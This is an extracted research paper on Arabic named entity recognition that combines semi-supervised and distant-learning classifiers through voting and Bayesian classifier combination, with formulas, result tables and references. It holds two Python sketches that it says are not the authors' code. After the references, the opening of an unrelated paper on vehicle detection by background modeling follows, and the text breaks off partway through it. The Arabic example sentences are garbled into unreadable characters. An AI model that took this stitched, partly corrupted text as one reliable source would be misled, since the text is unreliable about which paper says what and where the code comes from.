It also depends on Wikipedia features, such as inter-language links and redirects, to handle the rich morphology of Arabic without the need to perform excessive pre-processing steps (e.g., POS- tagging, deep morphological analysis), which has a slight negative effect on the precision of the DL clas- sifier. The recall, however, of the DL classifier is high, covering as many NEs as possible in all pos- sible domains. Therefore, the DL classifier is better than the SSL classifier in detecting NEs that appear in ambiguous contexts (they can be used for differ- ent NE types) and with no obvious clues (NE indi- cators). For example, detecting ø P @Q� ̄ “Ferrari” and AJ »ñ K“Nokia” as organization names in the following sentences: 2 Also known as trigger words which help in identifying NEs within text • . . . ø P @Q� ̄ Ð Qk ø YË @ ,ñ JK P �� K A� úΫ ñ� �ñË @ Ð Y �®�K “Alonso got ahead of the Renault driver who prevented Ferrari from ... ” • �é �® ®�Ë @ Ð AÖ �ß @ à C« @ áÓ Ð ñK YªK. AJ »ñ K H. A¢ k Z Ag. “Nokia’s speech came a day after the comple- tion of the deal” The strengths and weaknesses of the SSL and DL classifiers indicates that a classifier ensemble could perform better than its individual components. 4.2 Classifier Combination Methods Classifier combination methods are suitable when we need to make the best use of the predictions of multiple classifiers to enable higher accuracy classi- fications. Dietterich (2000a) reviews many methods for constructing ensembles and explains why clas- sifier combination techniques can often gain better performance than any base classifier. Tulyakov et al. (2008) introduce various categories of classifier combinations according to different criteria includ- ing the type of the classifier’s output and the level at which the combinations operate. Several empir- ical and theoretical studies have been conducted to compare ensemble methods such as boosting, ran- domisation, and bagging techniques (Maclin and Opitz, 1997; Dietterich, 2000b; Bauer and Kohavi, 1999). Ghahramani and Kim (2003) explore a gen- eral framework for a Bayesian model combination that explicitly models the relationship between each classifier’s output and the unknown true label. As such, multiclass Bayesian Classifier Combination (BCC) models are developed to combine predictions of multiple classifiers. Their proposed method for BCC in the machine learning context is derived di- rectly from the method proposed in (Haitovsky et al., 2002) for modelling disagreement between human assessors, which in turn is an extension of (Dawid and Skene, 1979). Similar studies for modelling data annotation using a variety of methods are presented in (Carpenter, 2008; Cohn and Specia, 2013). Simp- son et al. (2013) present a variant of BCC in which they consider the use of a principled approximate Bayesian method, variational Bayes (VB), as an in- ference technique instead of using Gibbs Sampling. They also alter the model so as to use point values for hyper-parameters, instead of placing exponential hyper-priors over them. 248 The following sections detail the combination methods used in this paper to combine the minimally supervised classifiers for Arabic NER. 4.2.1 Voting Voting is the most common method in classifier combination because of its simplicity and accept- able results (Van Halteren et al., 2001; Van Erp et al., 2002). Each classifier is allowed to vote for the class of its choice. 
It is common to take the majority vote, where each base classifier is given one vote and the class with the highest number of votes is chosen. In the case of a tie, when two or more classes receive the same number of votes, a random selection is taken from among the winning classes. It is useful, however, if base classifiers are distinguished by their quality. For this purpose, weights are used to encode the importance of each base classifier (Van Erp et al., 2002). Equal voting assumes that all classifiers have the same quality (Van Halteren et al., 2001). Weighted voting, on the other hand, gives more weight to classifiers of better quality. So, each classifier is weighted according to its overall precision, or its precision and recall on the class it suggests. Formally, given K classifiers, a widely used combination scheme is the linear interpolation of the classifiers' class probability distributions:

P(C \mid S_1^K(w)) = \sum_{k=1}^{K} P_k(C \mid S_k(w)) \cdot \lambda_k(w)

where P_k(C \mid S_k(w)) is an estimation of the probability that the correct classification is C given S_k(w), the class for the word w as suggested by classifier k, and \lambda_k(w) is the weight that specifies the importance given to each classifier k in the combination. P_k(C \mid S_k(w)) is computed as

P_k(C \mid S_k(w)) = \begin{cases} 1, & \text{if } S_k(w) = C \\ 0, & \text{otherwise} \end{cases}

For equal voting, each classifier should have the same weight (e.g., \lambda_k(w) = 1/K). In the case of weighted voting, the weight associated with each classifier can be computed from its precision and/or recall, as illustrated above. 4.2.2 Independent Bayesian Classifier Combination (IBCC) Using a Bayesian approach to classifier combination (BCC) provides a mathematical combination framework in which many classifiers, with various distributions and training features, can be combined to provide more accurate information. This framework explicitly models the relationship between each classifier's output and the unknown true label (Levenberg et al., 2014). This section describes the Bayesian approach to classifier combination adopted in this paper, which, like the work of Levenberg et al. (2014), is based on Simpson et al.'s (2013) simplification of the Ghahramani and Kim (2003) model. For the i-th data point, the true label t_i is assumed to be generated by a multinomial distribution with parameter \delta: p(t_i = j \mid \delta) = \delta_j, which models the class proportions. True labels may take values t_i = 1 \dots J, where J is the number of true classes. It is also assumed that there are K base classifiers. The outputs of the classifiers are assumed to be discrete with values l = 1 \dots L, where L is the number of possible outputs. The output c_i^{(k)} of classifier k is assumed to be generated by a multinomial distribution with parameters \pi_j^{(k)}:

p(c_i^{(k)} = l \mid t_i = j, \pi_j^{(k)}) = \pi_{j,l}^{(k)}

where \pi^{(k)} is the confusion matrix for classifier k, which quantifies the decision-making abilities of each base classifier. As in Simpson et al.'s (2013) study, we assume that the parameters \pi_j^{(k)} and \delta have Dirichlet prior distributions with hyper-parameters \alpha_{0,j}^{(k)} = [\alpha_{0,j1}^{(k)}, \alpha_{0,j2}^{(k)}, \dots, \alpha_{0,jL}^{(k)}] and \nu = [\nu_{0,1}, \nu_{0,2}, \dots, \nu_{0,J}], respectively. Given the observed class labels and based on the above prior, the joint distribution over all variables for the IBCC model is

p(\delta, \Pi, t, c \mid A_0, \nu) = \prod_{i=1}^{I} \Big\{ \delta_{t_i} \prod_{k=1}^{K} \pi_{t_i, c_i^{(k)}}^{(k)} \Big\} \, p(\delta \mid \nu) \, p(\Pi \mid A_0),

where \Pi = \{\pi_j^{(k)} \mid j = 1 \dots J, k = 1 \dots K\} and A_0 = \{\alpha_{0,j}^{(k)} \mid j = 1 \dots J, k = 1 \dots K\}.
The conditional probability of a test data point t_i being assigned class j is given by

p(t_i = j) = \frac{\rho_{ij}}{\sum_{y=1}^{J} \rho_{iy}}, \qquad \text{where } \rho_{ij} = \delta_j \prod_{k=1}^{K} \pi_{j, c_i^{(k)}}^{(k)}.

In our implementation we used point values for A_0, as in (Simpson et al., 2013). The values of the hyper-parameters A_0 offered a natural method to include any prior knowledge. Thus, they can be regarded as pseudo-counts of prior observations, and they can be chosen to represent any prior level of uncertainty in the confusion matrices, \Pi. Our inference technique for the unknown variables (\delta, \pi, and t) was Gibbs sampling, as in (Ghahramani and Kim, 2003; Simpson et al., 2013). Figure 2 shows the directed graphical model for IBCC. The c_i^{(k)} represent observed values, circular nodes are variables with distributions, and square nodes are variables instantiated with point values.

Figure 2: The directed graph of IBCC (plates over classifiers k = 1, 2, ..., K and data points i = 1, 2, ..., I; hyper-parameters \nu_0 and \alpha_0^{(k)}, variables \delta, \pi^{(k)}, t_i, and observed outputs c_i^{(k)}).

5 Data In this section, we describe the two datasets we used: • Validation set (also known as a development set), composed of NEWS + BBCNEWS: 90% of this dataset is used to estimate the weight of each base classifier and 10% is used to perform error analysis. • Test set (ANERcorp test set): this dataset is used to evaluate the different classifier combination methods. The validation set is composed of two datasets: NEWS and BBCNEWS. The NEWS set contains around 15k tokens collected by Darwish (2013) from the RSS feed of the Arabic (Egypt) version of news.google.com from October 2012. We created the BBCNEWS corpus by collecting a representative sample of news from the BBC in May 2014. It contains around 3k tokens and covers different types of news such as politics, economics, and entertainment. The ANERcorp test set makes up 20% of the whole ANERcorp set. The ANERcorp set is a newswire corpus built and manually tagged especially for the Arabic NER task by Benajiba et al. (2007a) and contains around 150k tokens. This test set is commonly used in the Arabic NER literature to evaluate supervised classifiers (Benajiba and Rosso, 2008; Abdul-Hamid and Darwish, 2010; Abdallah et al., 2012; Oudah and Shaalan, 2012) and minimally-supervised classifiers (Alotaibi and Lee, 2013; Althobaiti et al., 2013; Althobaiti et al., 2014), which allows us to review the performance of the combined classifiers and compare it to the performance of each base classifier. 6 Experimental Analysis 6.1 Experimental Setup In the IBCC model, the validation data was used as known t_i to ground the estimates of the model parameters. The hyper-parameters were set as \alpha_j^{(k)} = 1 and \nu_j = 1 (Kim and Ghahramani, 2012; Levenberg et al., 2014). The initial values for the random variables were set as follows: (a) the class proportion \delta was initialised to the result of counting t_i, and (b) the confusion matrix \pi was initialised to the result of counting t_i and the output of each classifier c^{(k)}. Gibbs sampling was run well past stability (i.e., 1000 iterations). Stability was actually reached in approximately 100 iterations. All parameters required in the voting methods were specified using the validation set. We examined two different voting methods: equal voting and weighted voting. In the case of equal voting, each classifier was given an equal weight, 1/K, where K was the number of classifiers to be combined. In weighted voting, total precision was used in order to give preference to classifiers with good quality.
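To make the setup above concrete, here are two short sketches: first the voting combination of Section 4.2.1, and then a simplified Gibbs sampler for the IBCC model. Both are illustrative implementations under the stated assumptions (symmetric Dirichlet priors with α = 1 and ν = 1, known labels on the validation portion), not the authors' code.

```python
# Sketch of equal/weighted voting for a single word.
# `predictions`: one class label per base classifier;
# `weights`: the lambda_k values (e.g., [1/K]*K for equal voting, or
# per-classifier precision for weighted voting).
from collections import defaultdict
import random

def vote(predictions, weights):
    scores = defaultdict(float)
    for label, w in zip(predictions, weights):
        scores[label] += w            # P_k(C|S_k(w)) is 1 for the predicted class
    best = max(scores.values())
    winners = [c for c, s in scores.items() if s == best]
    return random.choice(winners)     # random tie-break, as described above
```

For IBCC, the sampler below alternates between drawing the class proportions δ, the confusion matrices π(k), and the unknown true labels t_i, with validation tokens held fixed at their known labels; a sketch only.

```python
# Simplified Gibbs sampler for IBCC (sketch).
# C: (I, K) integer array of base-classifier outputs in {0..L-1};
# known: dict {i: true_label} for validation points; J: number of true classes.
import numpy as np

def ibcc_gibbs(C, known, J, n_iter=1000, burn_in=100, alpha0=1.0, nu0=1.0, seed=0):
    rng = np.random.default_rng(seed)
    I, K = C.shape
    L = int(C.max()) + 1
    # Initialise true labels: known where available, random elsewhere.
    t = np.array([known.get(i, rng.integers(J)) for i in range(I)])
    post = np.zeros((I, J))
    for it in range(n_iter):
        # delta ~ Dirichlet(nu0 + class counts of the current labels).
        delta = rng.dirichlet(nu0 + np.bincount(t, minlength=J))
        # pi[k, j] ~ Dirichlet(alpha0 + confusion counts for classifier k, class j).
        pi = np.empty((K, J, L))
        for k in range(K):
            for j in range(J):
                counts = np.bincount(C[t == j, k], minlength=L)
                pi[k, j] = rng.dirichlet(alpha0 + counts)
        # Resample the unknown true labels.
        for i in range(I):
            if i in known:
                continue
            rho = delta * np.prod(pi[np.arange(K), :, C[i]], axis=0)
            rho /= rho.sum()
            t[i] = rng.choice(J, p=rho)
        if it >= burn_in:                 # accumulate posterior label samples
            post[np.arange(I), t] += 1
    return post / post.sum(axis=1, keepdims=True)
```

Averaging the sampled labels after burn-in gives a per-token class posterior from which the final tag can be taken.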
250 6.2 Results and Discussion 6.2.1 A Simple Baseline Combined Classifier A proposed combined classifier simply and straightforwardly makes decisions based on the agreed decisions of the base classifiers, namely the SSL classifier and DL classifier. That is, if the base classifiers agree on the NE type of a certain word, then it is annotated by an agreed NE type. In the case of disagreement, the word is considered not named entity. Table 2 shows the results of this combined classifier, which is considered a baseline in this pa- per. Precision Recall Fβ=1 Person 97.31 24.69 39.39 Location 98.35 40.01 56.88 Organisation 97.38 33.2 49.52 Overall 97.68 32.63 48.92 Table 2: The results of the baseline The results of the combined classifier shows very high precision, which indicates that both base clas- sifiers are mostly accurate. The base classifiers also commit different errors that are evident in the low recall. The accuracy and diversity of the single clas- sifiers are the main conditions for a combined clas- sifier to have better accuracy than any of its com- ponents (Dietterich, 2000a). Therefore, in the next section we take into consideration various classifier combination methods in order to aggregate the best decisions of SSL and DL classifiers, and to improve overall performance. 6.2.2 Combined Classifiers: Classifier Combination Methods The SSL and DL classifiers are trained with two different algorithms using different training data. The SSL classifier is trained on ANERcorp training data, while the DL classifier is trained on a corpus automatically derived from Arabic Wikipedia, as ex- plained in Section 3.1 and 3.2. We combine the SSL and DL classifiers using the three classifier combination methods, namely equal voting, weighted voting, and IBCC. Table 3 shows the results of these classifier combination methods. The IBCC scheme outperforms all voting techniques and base classifiers in terms of F-score. Regard- ing precision, voting techniques show the highest scores. However, the high precision is accompanied by a reduction in recall for both voting methods. The IBCC combination method also has relatively high precision compared to the precision of base classi- fiers. Much better recall is registered for IBCC, but it is still low. NEs Combination Methods Precision Recall Fβ=1 PER Equal Voting 79.99 41.88 54.97 Weighted Voting 80.15 44.24 57.01 IBCC 77.87 63.86 70.17 LOC Equal Voting 86.87 30.66 45.32 Weighted Voting 87.48 30.23 44.93 IBCC 81.52 59.86 69.03 ORG Equal Voting 97.01 29.97 45.79 Weighted Voting 98.11 30.98 47.09 IBCC 95.44 34.31 50.47 Overall Equal Voting 87.96 34.17 49.22 Weighted Voting 88.58 35.15 50.33 IBCC 84.94 52.68 65.03 NEs Base Classifiers Precision Recall Fβ=1 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 3: The performances of various combination meth- ods. 6.2.3 Combined Classifiers: Restriction of the Combination Process An error analysis of the validation set shows that 10.01% of the NEs were correctly detected by the semi-supervised classifier, but considered not NEs by the distant learning classifier. At the same time, the distant learning classifier managed to correctly detect 25.44% of the NEs that were considered not NEs by the semi-supervised classifier. We also no- ticed that false positive rates, i.e. the possibility of considering a word NE when it is actually not NE, are very low (0.66% and 2.45% for the semi- supervised and distant learning classifiers respec- tively). 
These low false positive rates and the high percentage of the NEs that are detected and missed by the two classifiers in a mutually exclusive way can be exploited to obtain better results, more specif- ically, to increase recall without negatively affect- ing precision. Therefore, we restricted the combi- 251 nation process to only include situations where the base classifiers agree or disagree on the NE type of a certain word. The combination process is ignored in cases where the base classifiers only disagree on detecting NEs. For example, if the base classifiers disagree on whether a certain word is an NE or not, the word is automatically considered an NE. Figure 3 provides some examples that illustrate the restric- tions we applied to the combination process. The annotations in the examples are based on the CoNLL 2003 annotation guidelines (Chinchor et al., 1999). Predictions of SSL Classifier Predictions of DL Classifier B-PER B-LOC O B-LOC B-ORG O B-PER B-PER Apply Combination Method B-LOC B-ORG Apply Combination Method Figure 3: Examples of restricting the combination pro- cess. Restricting the combination process in this way increases recall without negatively affecting the pre- cision, as seen in Table 4. The increase in recall makes the overall F-score for all combination meth- ods higher than those of base classifiers. This way of using the IBCC model results in a performance level that is superior to all of the individual clas- sifiers and other voting-based combined classifiers. Therefore, the IBCC model leads to a 12% increase in the performance of the best base classifier, while voting methods increase the performance by around 7% - 10%. These results highlight the role of re- stricting the combination, which affects the perfor- mance of combination methods and gives more con- trol over how and when the predictions of base clas- sifiers should be combined. 6.2.4 Comparing Combined Classifiers: Statistical Significance of Results We tested whether the difference in performance between the three classifier combination methods - equal voting, weighted voting, and IBCC - is sig- nificant using two different statistical tests over the results of these combination methods on an ANER- corp test set. The alpha level of 0.01 was used as a significance criterion for all statistical tests. First, We ran a non-parametric sign test. The small p- value (p � 0.01) for each pair of the three combina- NEs Combination Methods Precision Recall Fβ=1 PER Equal Voting 74.46 61.88 67.59 Weighted Voting 77.77 63.50 69.91 IBCC 77.88 64.56 70.60 LOC Equal Voting 74.04 71.36 72.68 Weighted Voting 74.05 73.70 73.86 IBCC 76.20 75.91 76.05 ORG Equal Voting 76.01 63.97 69.47 Weighted Voting 76.30 66.60 71.12 IBCC 78.91 66.65 72.26 Overall Equal Voting 74.84 65.74 69.99 Weighted Voting 76.04 67.93 71.76 IBCC 77.66 69.04 73.10 NEs Base Classifiers Precision Recall Fβ=1 Overall SSL 86.03 51.29 64.27 DL 76.44 56.42 64.92 Table 4: The performances of various combination meth- ods when restricting the combination process. tion methods, as seen in Table 5, suggests that these methods are significantly different. The only com- parison where no significance was found is equal voting vs. weighted voting, when we used them to combine the data without any restrictions (p = 0.3394). 
Combination Methods (Without Restriction) Equal Voting Weighted Voting IBCC Equal Voting Weighted Voting 0.3394 IBCC <2.2E-16 <2.2E-16 Combination Methods (With Restriction) Equal Voting Weighted Voting IBCC Equal Voting Weighted Voting 1.78E-07 IBCC <2.2E-16 1.97E-06 Table 5: The sign test results (exact p values) for the pair- wise comparisons of the combination methods. Second, we used a bootstrap sampling (Efron and Tibshirani, 1994), which is becoming the de facto standards in NLP (Søgaard et al., 2014). Table 6 compares each pair of the three combination meth- ods using a bootstrap sampling over documents with 10,000 replicates. It shows the p-values and confi- dence intervals of the difference between means. 252 Combination With Restriction Combination Methods Comparison p-value [95% CI] Weighted Voting, Equal Voting 0.000 [0.270, 0.600] IBCC, Equal Voting 0.000 [0.539, 0.896] IBCC, Weighted Voting 0.000 [0.157, 0.426] Combination Without Restriction Combination Methods Comparison p-value [95% CI] Weighted Voting, Equal Voting 0.508 [-0.365, 0.349] IBCC, Equal Voting 0.000 [4.800, 6.122] IBCC, Weighted Voting 0.000 [4.783, 6.130] Table 6: The bootstrap test results (p-values and CI) for the pairwise comparisons of the combination methods. The differences in performance between almost all the three methods of combination are highly sig- nificant. The one exception is the comparison be- tween equal voting and weighted voting, when they are used as a combination method without restric- tion, which shows a non-significant difference (p- value = 0.508, CI = -0.365 to 0.349). Generally, the IBCC scheme performs signifi- cantly better than voting-based combination meth- ods whether we impose restrictions on the combina- tion process or not, as can be seen in Table 3 and Table 4. 7 Conclusion Major advances over the past decade have occurred in Arabic NER with regard to utilising various su- pervised systems, exploring different features, and producing manually annotated corpora that mostly cover the standard set of NE types. More effort and time for additional manual annotations are re- quired when expanding the set of NE types, or ex- porting NE classifiers to new domains. This has mo- tivated research in minimally supervised methods, such as semi-supervised learning and distant learn- ing, but the performance of such methods is lower than that achieved by supervised methods. How- ever, semi-supervised methods and distant learning tend to have different strengths, which suggests that better results may be obtained by combining these methods. Therefore, we trained two classifiers based on distant learning and semi-supervision techniques, and then combined them using a variety of classifier combination schemes. Our main contributions in- clude the following: • We presented a novel approach to Arabic NER using a combination of semi-supervised learning and distant supervision. • We used the Independent Bayesian Classifier Combination (IBCC) scheme for NER, and com- pared it to traditional voting methods. • We introduced the classifier combination restric- tion as a means of controlling how and when the predictions of base classifiers should be com- bined. This research demonstrated that combining the two minimal supervision approaches using various clas- sifier combination methods leads to better results for NER. 
The use of IBCC improves the performance by 8 percentage points over the best base classi- fier, whereas the improvement in the performance when using voting methods is only 4 to 6 percent- age points. Although all combination methods re- sult in an accurate classification, the IBCC model achieves better recall than other traditional combi- nation methods. Our experiments also showed how restricting the combination process can increase the recall ability of all the combination methods without negatively affecting the precision. The approach we proposed in this paper can be easily adapted to new NE types and different do- mains without the need for human intervention. In addition, there are many ways to restrict the combi- nation process according to the applications’ prefer- ences, either producing high accuracy or recall. For example, we may obtain a highly accurate combined classifier if we do not combine the predictions of all base classifiers for a certain word and automatically consider it not NE when one of the base classifier considers this word not NE. References Sherief Abdallah, Khaled Shaalan, and Muhammad Shoaib. 2012. Integrating rule-based system with classification for arabic named entity recognition. In Computational Linguistics and Intelligent Text Pro- cessing, pages 311–322. Springer. Samir AbdelRahman, Mohamed Elarnaoty, Marwa Magdy, and Aly Fahmy. 2010. Integrated machine 253 learning techniques for arabic named entity recogni- tion. IJCSI, 7:27–36. Ahmed Abdul-Hamid and Kareem Darwish. 2010. Sim- plified feature set for Arabic named entity recognition. In Proceedings of the 2010 Named Entities Workshop, pages 110–115. Association for Computational Lin- guistics. Steven Abney. 2010. Semisupervised learning for com- putational linguistics. CRC Press. Fahd Alotaibi and Mark Lee. 2012. Mapping Ara- bic Wikipedia into the named entities taxonomy. In Proceedings of COLING 2012: Posters, pages 43–52, Mumbai, India, December. The COLING 2012 Orga- nizing Committee. Fahd Alotaibi and Mark Lee. 2013. Automatically De- veloping a Fine-grained Arabic Named Entity Corpus and Gazetteer by utilizing Wikipedia. In IJCNLP. Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. 2013. A semi-supervised learning approach to arabic named entity recognition. In Proceedings of the Inter- national Conference Recent Advances in Natural Lan- guage Processing RANLP 2013, pages 32–40, Hissar, Bulgaria, September. INCOMA Ltd. Shoumen, BUL- GARIA. Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio. 2014. Automatic Creation of Arabic Named Entity Annotated Corpus Using Wikipedia. In Proceedings of the Student Research Workshop at the 14th Confer- ence of the European Chapter of the Association for Computational Linguistics (EACL), pages 106–115, Gothenburg. Marco Baroni, Brian Murphy, Eduard Barbu, and Mas- simo Poesio. 2010. Strudel: A Corpus-Based Seman- tic Model Based on Properties and Types. Cognitive Science, 34(2):222–254. Eric Bauer and Ron Kohavi. 1999. An empirical comparison of voting classification algorithms: Bag- ging, boosting, and variants. Machine learning, 36(1- 2):105–139. Yassine Benajiba and Paolo Rosso. 2008. Arabic named entity recognition using conditional random fields. In Proc. of Workshop on HLT & NLP within the Arabic World, LREC, volume 8, pages 143–153. Yassine Benajiba, Paolo Rosso, and José Miguel Benedı́ruiz. 2007a. Anersys: An Arabic Named En- tity Recognition System based on Maximum Entropy. 
In Computational Linguistics and Intelligent Text Pro- cessing, pages 143–153. Springer. Yassine Benajiba, Paolo Rosso, and José Miguel Benedı́ruiz. 2007b. Anersys: An arabic named en- tity recognition system based on maximum entropy. In Computational Linguistics and Intelligent Text Pro- cessing, pages 143–153. Springer. Yassine Benajiba, Mona Diab, Paolo Rosso, et al. 2008. Arabic named entity recognition: An svm-based ap- proach. In Proceedings of 2008 Arab International Conference on Information Technology (ACIT), pages 16–18. Bob Carpenter. 2008. Multilevel bayesian models of categorical data annotation. Unpublished manuscript. Available online at http://lingpipe-blog.com/lingpipe- white-papers/, last accessed 15-March-2015. Nancy Chinchor, Erica Brown, Lisa Ferro, and Patty Robinson. 1999. 1999 Named Entity Recognition Task Definition. MITRE and SAIC. Trevor Cohn and Lucia Specia. 2013. Modelling anno- tator bias with multi-task gaussian processes: An ap- plication to machine translation quality estimation. In ACL, pages 32–42. Kareem Darwish. 2013. Named Entity Recognition us- ing Cross-lingual Resources: Arabic as an Example. In ACL, pages 1558–1567. Alexander Philip Dawid and Allan M Skene. 1979. Max- imum likelihood estimation of observer error-rates us- ing the em algorithm. Applied statistics, pages 20–28. Thomas G. Dietterich. 2000a. Ensemble methods in ma- chine learning. In Multiple Classifier Systems, volume 1857 of Lecture Notes in Computer Science, pages 1– 15. Springer Berlin Heidelberg. Thomas G Dietterich. 2000b. An experimental compar- ison of three methods for constructing ensembles of decision trees: Bagging, boosting, and randomization. Machine learning, 40(2):139–157. Bradley Efron and Robert J Tibshirani. 1994. An intro- duction to the bootstrap. CRC press. Ali Elsebai, Farid Meziane, and Fatma Zohra Belkredim. 2009. A rule based persons names arabic extraction system. Communications of the IBIMA, 11(6):53–59. Radu Florian, Abe Ittycheriah, Hongyan Jing, and Tong Zhang. 2003. Named entity recognition through clas- sifier combination. In Proceedings of the seventh con- ference on Natural language learning at HLT-NAACL 2003-Volume 4, pages 168–171. Association for Com- putational Linguistics. Zoubin Ghahramani and Hyun-Chul Kim. 2003. Bayesian classifier combination. Technical report, University College London. Y Haitovsky, A Smith, and Y Liu. 2002. Modelling dis- agreements among and within raters assessments from the bayesian point of view. In Draft. Presented at the Valencia meeting 2002. Hyun-Chul Kim and Zoubin Ghahramani. 2012. Bayesian classifier combination. In International con- ference on artificial intelligence and statistics, pages 619–627. 254 Abby Levenberg, Stephen Pulman, Karo Moilanen, Ed- win Simpson, and Stephen Roberts. 2014. Predict- ing economic indicators from web text using sentiment composition. International Journal of Computer and Communication Engineering, 3(2):109–115. Richard Maclin and David Opitz. 1997. An empiri- cal evaluation of bagging and boosting. AAAI/IAAI, 1997:546–551. Slim Mesfar. 2007. Named entity recognition for ara- bic using syntactic grammars. In Natural Language Processing and Information Systems, pages 305–316. Springer. Peter Mika, Massimiliano Ciaramita, Hugo Zaragoza, and Jordi Atserias. 2008. Learning to Tag and Tag- ging to Learn: A Case Study on Wikipedia. vol- ume 23, pages 26–33. Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction with- out labeled data. 
In Proceedings of the Joint Confer- ence of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP: Volume 2 - Volume 2, ACL ’09, pages 1003–1011, Stroudsburg, PA, USA. Association for Computational Linguistics. David Nadeau and Satoshi Sekine. 2007. A survey of named entity recognition and classification. Lingvisti- cae Investigationes, 30(1):3–26. David Nadeau. 2007. Semi-supervised named entity recognition: learning to recognize 100 entity types with little supervision. Truc-Vien T. Nguyen and Alessandro Moschitti. 2011. End-to-end relation extraction using distant supervi- sion from external semantic repositories. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies: Short Papers - Volume 2, HLT ’11, pages 277–282, Stroudsburg, PA, USA. Association for Computational Linguistics. Joel Nothman, Nicky Ringland, Will Radford, Tara Mur- phy, and James R Curran. 2013. Learning multilin- gual Named Entity Recognition from Wikipedia. Ar- tificial Intelligence, 194:151–175. Mai Oudah and Khaled F Shaalan. 2012. A pipeline ara- bic named entity recognition using a hybrid approach. In COLING, pages 2159–2176. Marius Pasca, Dekang Lin, Jeffrey Bigham, Andrei Lif- chits, and Alpa Jain. 2006. Organizing and searching the world wide web of facts-step one: the one-million fact extraction challenge. In AAAI, volume 6, pages 1400–1405. Alexander E Richman and Patrick Schone. 2008. Mining Wiki Resources for Multilingual Named Entity Recog- nition. In ACL, pages 1–9. Ellen Riloff and Rosie Jones. 1999. Learning dictionar- ies for information extraction by multi-level bootstrap- ping. In AAAI, pages 474–479. Sriparna Saha and Asif Ekbal. 2013. Combining mul- tiple classifiers using vote based classifier ensemble technique for named entity recognition. Data & Knowledge Engineering, 85:15–39. Satoshi Sekine et al. 1998. NYU: Description of the Japanese NE system used for MET-2. In Proceed- ings of the Seventh Message Understanding Confer- ence (MUC-7), volume 17. Khaled Shaalan and Hafsa Raza. 2009. Nera: Named entity recognition for arabic. Journal of the Ameri- can Society for Information Science and Technology, 60(8):1652–1663. Edwin Simpson, Stephen Roberts, Ioannis Psorakis, and Arfon Smith. 2013. Dynamic bayesian combination of multiple imperfect classifiers. In Decision Making and Imperfection, pages 1–35. Springer. Anders Søgaard, Anders Johannsen, Barbara Plank, Dirk Hovy, and Hector Martinez. 2014. Whats in a p-value in nlp? In Proceedings of the eighteenth conference on computational natural language learning (CONLL14), pages 1–10. Sam Tardif, James R. Curran, and Tara Murphy. 2009. Improved Text Categorisation for Wikipedia Named Entities. In Proceedings of the Australasian Language Technology Association Workshop, pages 104–108. Sergey Tulyakov, Stefan Jaeger, Venu Govindaraju, and David Doermann. 2008. Review of classifier combi- nation methods. In Machine Learning in Document Analysis and Recognition, pages 361–386. Springer. Merijn Van Erp, Louis Vuurpijl, and Lambert Schomaker. 2002. An overview and comparison of voting methods for pattern recognition. In Eighth International Work- shop on Frontiers in Handwriting Recognition, pages 195–200. IEEE. Hans Van Halteren, Walter Daelemans, and Jakub Za- vrel. 2001. Improving accuracy in word class tagging through the combination of machine learning systems. Computational linguistics, 27(2):199–229. 
Wajdi Zaghouani. 2014. Critical Survey of the Freely Available Arabic Corpora. In Workshop on Free/Open-Source Arabic Corpora and Corpora Processing Tools, pages 1–8, Reykjavik, Iceland. Tong Zhang, Fred Damerau, and David Johnson. 2002. Text chunking based on a generalization of winnow. The Journal of Machine Learning Research, 2:615–637.

work_2tflktf2hvbkja6rltueqe3w4q ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) Research on Vehicle Detection Method Based on Background Modeling Zhichao Lian School of Computer Science and Engineering Xi'an Technological University Xi'an 710032, China e-mail: 965941167@qq.com Zhongsheng Wang School of Computer Science and Engineering Xi'an Technological University Xi'an 710032, China e-mail: wangzhongsheng@xatu.edu.cn

Abstract—This paper mainly studies the background difference method in the field of intelligent traffic. It proposes a background modeling method based on frame difference and compares it with the statistical average background model and the Gaussian distribution background modeling method; the vehicle contour is then obtained by a morphological method. Finally, experiments were carried out on four normal road traffic surveillance videos, and the effective detection rate of the method used in this paper reaches 93.75%, which gives it a certain degree of practical applicability. The algorithm still needs to be tested further under more complex weather and road conditions.

Keywords-Vehicle Detection; Background Modeling; Inter-frame Difference; Morphological Method

I. INTRODUCTION In practical applications, a vehicle detection method with fast response, high accuracy, and good adaptability is a key part of intelligent traffic detection and management. Detecting moving objects in video is affected by many complicated conditions. Three commonly used methods for detecting moving vehicles are the difference method, the optical flow method, and the background difference method. The difference method includes the inter-frame difference method and the time difference method. The inter-frame difference method is fast, its algorithm is simple, and it can be used in scenes with high real-time requirements. The time difference method is suitable for dynamically changing scenes but does not completely segment moving objects. The optical flow method performs poorly in terms of real-time use and practicality, and it is difficult for it to meet the requirements of real-time detection of moving vehicles. The background difference method gives good results in both speed and detection quality when the camera is relatively stable. The key questions for the background difference method are how to set up the background and how to update it dynamically in real time. This article uses the background difference method.

II. COMMONLY USED BACKGROUND MODELING UPDATE MODELS In monitoring applications, the background difference method needs to establish a background reference frame. Establishing an accurate and robust background model is the key to the system; the accuracy of this reference frame directly affects the output. The commonly used background models are the statistical average method and the Gaussian distribution background model.

A. Statistical average method background model The statistical average method, also called the mean method, is essentially a statistical filtering idea.
Over a period of time, the collected images are added together and the average value is taken as the reference background model. That is, the gray-level average of N frames in the image sequence is used as the estimate of the background image, in order to weaken the interference of moving objects with the background. The specific calculation is shown in formula (1):

Avg_k = \frac{1}{N}(f_k + f_{k-1} + \dots + f_{k-N+1})    (1)

where Avg_k is the background model established when the system acquires frame k, N is the number of frames being averaged, and f_k, f_{k-1}, ..., f_{k-N+1} are the consecutive frames of the sequence. The statistical average method is simple and fast, but it easily causes noise to accumulate and mix in. The method is more suitable for scenes with a small number of continuously moving objects, where the background is visible most of the time. When there are many moving objects, especially slowly moving ones, the estimated background deviates considerably.

